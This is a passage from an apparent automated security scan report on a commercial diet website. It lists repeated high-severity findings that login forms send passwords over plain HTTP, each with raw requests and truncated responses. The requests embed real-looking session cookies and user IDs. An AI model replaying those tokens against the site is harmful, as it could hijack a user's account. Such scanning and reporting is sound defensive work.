Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:18:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Defect #671 - Need to inc
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/diabetes.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.13. http://www.nutrisystem.com/jsps_hmr/catalog/men/silver.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/silver.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/men/silver.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:17:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/silver.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.14. http://www.nutrisystem.com/jsps_hmr/catalog/men/vegetarian.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/vegetarian.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/men/vegetarian.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:19:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/men/vegetarian.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.15. http://www.nutrisystem.com/jsps_hmr/catalog/menu/food.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/menu/food.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/menu/food.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/menu/food.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.16. http://www.nutrisystem.com/jsps_hmr/catalog/women/basic.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/basic.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/women/basic.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/basic.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.17. http://www.nutrisystem.com/jsps_hmr/catalog/women/diabetes.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/diabetes.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/women/diabetes.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Location: /jsps_hmr/product-pages/diabetic_overview.jsp
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to inclu
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/diabetes.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.18. http://www.nutrisystem.com/jsps_hmr/catalog/women/silver.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/silver.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/women/silver.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Defect #671 - Need to include s
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/silver.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.19. http://www.nutrisystem.com/jsps_hmr/catalog/women/vegetarian.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/women/vegetarian.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/catalog/women/vegetarian.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 03:15:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- Defect #671 - Need to include
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/catalog/women/vegetarian.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.20. http://www.nutrisystem.com/jsps_hmr/corporate/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/corporate/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/corporate/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/corporate/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.21. http://www.nutrisystem.com/jsps_hmr/faq/index.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/faq/index.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/faq/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/faq/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

3.22. http://www.nutrisystem.com/jsps_hmr/giftcards/giftcard_selection_page.jsp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/giftcards/giftcard_selection_page.jsp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /jsps_hmr/giftcards/giftcard_selection_page.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 04:07:46 GMT
Connection: close

